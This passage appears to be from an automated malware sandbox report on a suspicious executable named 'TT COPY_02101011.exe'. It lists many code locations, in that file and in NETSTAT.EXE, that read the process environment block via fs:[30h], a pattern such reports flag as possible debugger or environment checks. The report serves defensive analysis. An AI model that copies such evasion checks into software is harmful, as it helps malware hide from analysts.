          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A95210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B24257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B65BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B4D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B48DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B1A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B13540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B4FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B4FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03243B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03243B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03221B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03221B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03254A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03254A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03228A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03215210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03215210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03215210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03215210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03233A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219100 mov eax, dword ptr fs:[00000030h]
